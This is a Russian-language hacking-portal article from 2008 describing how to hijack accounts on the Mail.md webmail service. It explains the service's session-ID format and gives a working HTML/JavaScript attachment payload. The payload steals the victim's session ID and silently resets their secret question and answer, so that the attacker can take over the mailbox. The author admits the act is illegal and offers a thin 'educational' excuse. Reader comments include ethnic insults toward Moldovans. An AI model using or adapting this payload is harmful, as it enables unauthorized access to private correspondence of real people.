Нажмите CTRL-D чтобы добавить нас в закладки
Внимание! Вы находитесь в незащищенном режиме (HTTP). Для перехода в защищенный режим SSL, нажмите здесь
HackZone.RU - mail.md или читаем письма молдован
Войти / Регистрация / Участники
Онлайн объединение нескольких PDF файлов в один, разъединение PDF на страницы
-

Поиск
Форумы


Реклама

Разместить рекламу


TOP лист
Партнеры



Поиск ТОП Добавить публикацию


mail.md или читаем письма молдован

11.04.2008

Читаем чужие письма молдован 8) на Mail.md И в начале небольшое предупреждение... Все о чем я сейчас буду рассказывать,

наверно преследуется по закону, и вообще аморально, поэтому данная инфа приводится исключительно в образовательных целях, особливо это будет полезно почитать админу вышеуказанного сервера (но ему об этом еще рано знать).
Итак. Что можно сказать, бросив беглый взгляд на их усилия предоставить

своим пользователям конфиденциальность??? Вроде все нормально, но!

 Для того чтобы сменить пароль на ящик надо знать старый пароль,

а для смены секретного вопроса и соответственно ответа на него,

нифига знать не надо! (Вот уроды (c) by Брат II). Значит его и будем менять.
Весь почтовый сервер обслуживает всего одна цгеха, которая имеет звучное название login.

Для идентификации пользователя используется такая

фигня - никнаме:x:x:x:x:xxxxxxxx:x:x:x:x, где никнаме - имя пользователя,

а x-какято цифра. То есть форма отправляет серверу примерно

следующее: /cgi-bin/login?sessionid= никнаме:x:x:x:x:xxxxxxxx:x:x:x:x,

ну и конечно же поля формы. Если внимательно присмотреться к этим цифрам,

можно заметить, что то, что посередине генерируется случайно (и не меняется весь сеанс работы с ящиком), все остальные числа статические, и наверняка что-то для сервера значат.
От нечего делать я из всех записал, и вот что у меня получилось. В Главном меню:
nickname:0:1:0:6:xxxxxxxx:3:3:1:1 - линк на инбох,
nickname:0:1:0:6:xxxxxxxx:4:3:1:1 - линк на compose
nickname:0:1:0:6:xxxxxxxx:11:3:1:1 - линк на addreses
nickname:0:1:0:6:xxxxxxxx:12:3:1:1 - линк на folders
nickname:0:1:0:6:xxxxxxxx:6:3:1:1 - линк на options
nickname:0:1:0:6:xxxxxxxx:14:3:1:1 - линк на logout
на смену пароля и секретного вопроса -  nickname:0:1:0:6:xxxxxxxx:16:26:1:1
Я мог бы продолжить и перечислить все остальное, если надо сами глянете,

скажу тока пару слов - первое число (сразу после имени) - это номер письма,

которое Вы сейчас читаете, второе число - номер папки, в которой вы находитесь

(1 по умолчанию - INBOX, 2 - SEND ITEMS, 3 - DELETET ITEMS, ну и т.д)

следующая - гуй ее знает что это, но она всегда = 0, потом идет цифра,

которая показывает как сортировать письма (1 - by Sender, 3 - by Subject, 7 - by Size и 5 - by Date).

Дальше идет рандомное 8-значное число, 2 цифры за ним говорят серверу что мы хотим сделать,

и 2 последние всегда = 1 Итак, все что нам надо сделать - узнать эти рандомно генерируемые числа.
Я думаю хватит теории, вот непосредственно атака: создаем у себя на диске файлец и назовем его например part2,

в нем пишем следующую муть:
<img src="http://" onmouseover="
line1=parent.frames[0].document.links[0];
line2=line1.href;
a3=line2.length;
a3?-7;
line3=line2.substring(43,a3);
line3=line3+'16:26:1:1';
document.forma.sessionid.value=line3;
document.forma.submit();">
<form name=forma action="/cgi-bin/login" method=post>
<input type=hidden name="sessionid" value="">
<input type=hidden name="questionr" value="vopros">
<input type=hidden name="passremin" value="otvet">
</form>
Дальше текст письма и все такое.... Пишем письмецо жертве, и прикрепляем к нему наш файлец part2...

Как тока жертва откроет наш атачмент, секретный вопрос на его(ее) ящик поменяется... Всю эту фигню надо слать обязательно в атачменте, потому что по-иному фильтруются теги...

При копировании материалов ссылка на HackZone.RU обязательна

Для того, чтобы проголосовать за эту публикацию - отправьте СМС с текстом hmhack 1571 на номер 4444 (стоимость сообщения 0,30$ без НДС). Услуга доступна абонентам России, Казахстана и Украины. Отправив сообщение вы оказываете поддержку не только проекту в целом, но и автору данной статьи лично

Добавить страницу в закладки
Delicious Google Slashdot Yahoo Yandex.ru LiveJournal Reddit Digg Technorati Bobrdobr.ru Newsland.ru Smi2.ru Rumarkz.ru Vaau.ru Memori.ru Rucity.com Moemesto.ru News2.ru Mister-Wong.ru Myscoop.ru 100zakladok.ru

 Детали
Категория: Взлом
Опубликовал: ObiWanKaNNabiZe
Просмотров: 7831
Проголосовало через SMS: 0
  Разместить у себя на сайте
Прямая ссылка
HTML
BBCode ссылка
BBCode ссылка с текстом

 Комментарии (оставить свой комментарий можно здесь)
а что вам молдовани плохого сделали?????????????????
03.10.2008 / blackdog18211
еси они отсталый нарор то это не означает что над ними можно угаать!!!вот лучше амерекосов бомбите
03.10.2008 / blackdog18211
СПАСИБО ЗА ПОДДЕРЖКУ !!!
Bayan
01.07.2009 / victorx81
Только зарегистрированные пользователи могут оставлять комментарии

Зарегистрироваться *** Авторизоваться


 Последние новости и статьи  Последние сообщения с форумов
  • Алжирские хакеры по ошибке взломали сайт британского замка
  • Киберпреступники предпринимают новые попытки распространения фаль...
  • DDoS-атака может стоить "ВТБ24" 194 млн рублей
  • Ботнет. Как,и для чего они создаются?
  • ЛК предупреждает о появлении нового IM-червя
  • Украинский студент получил три года тюрьмы за взлом сайта
  • Пользователей из России и Турции чаще всего атакуют хакеры
  • Русские хакеры грабят Запад, дружат со спецслужбами и снимают глу...
  • Хакерам удалось взломать сервер одного из подразделений Федеральн...
  • Хитрости охотника за датинг-базами

    Все новости... Все статьи... Прислать новость RSS
  • Разное / Куплю, продам, отдам » Re: Продается Rezident Loader
  • Программирование / C/C++/VC++ » C++Builder 2010 отправка письма с аттачем(вложением)
  • Взлом и безопасность / ICQ,AIM,YAHOO,QIP » Re: Brutal.0.8 как брутить!
  • Интернет / Разное » яндекс в качестве проксика
  • Разное / Куплю, продам, отдам » Re: Продам загрузки./траф
  • Downloads / Другое » Re: Где можно скачать плагины для OllyDbg ?
  • Разное / Куплю, продам, отдам » Re: продается хороший заработок!
  • Взлом и безопасность / ICQ,AIM,YAHOO,QIP » Re: Brutal.0.8 как брутить!
  • Разное / Куплю, продам, отдам » Re: продается хороший заработок!
  • Разное / Куплю, продам, отдам » Re: «3389.ru» – Продажа качественных Dedicated Servers (деди...

    Все форумы... RSS



  • Разместить рекламу
    © HackZone Ltd. 2007-2010. Все права зарегистрированы.
    Перепечатка материалов без согласования и указания источника будет преследоваться по Закону

    О проекте | История проекта | Размещение рекламы | Обратная связь | Правила поведения на портале
    Ya-Cyt службы мониторинга серверов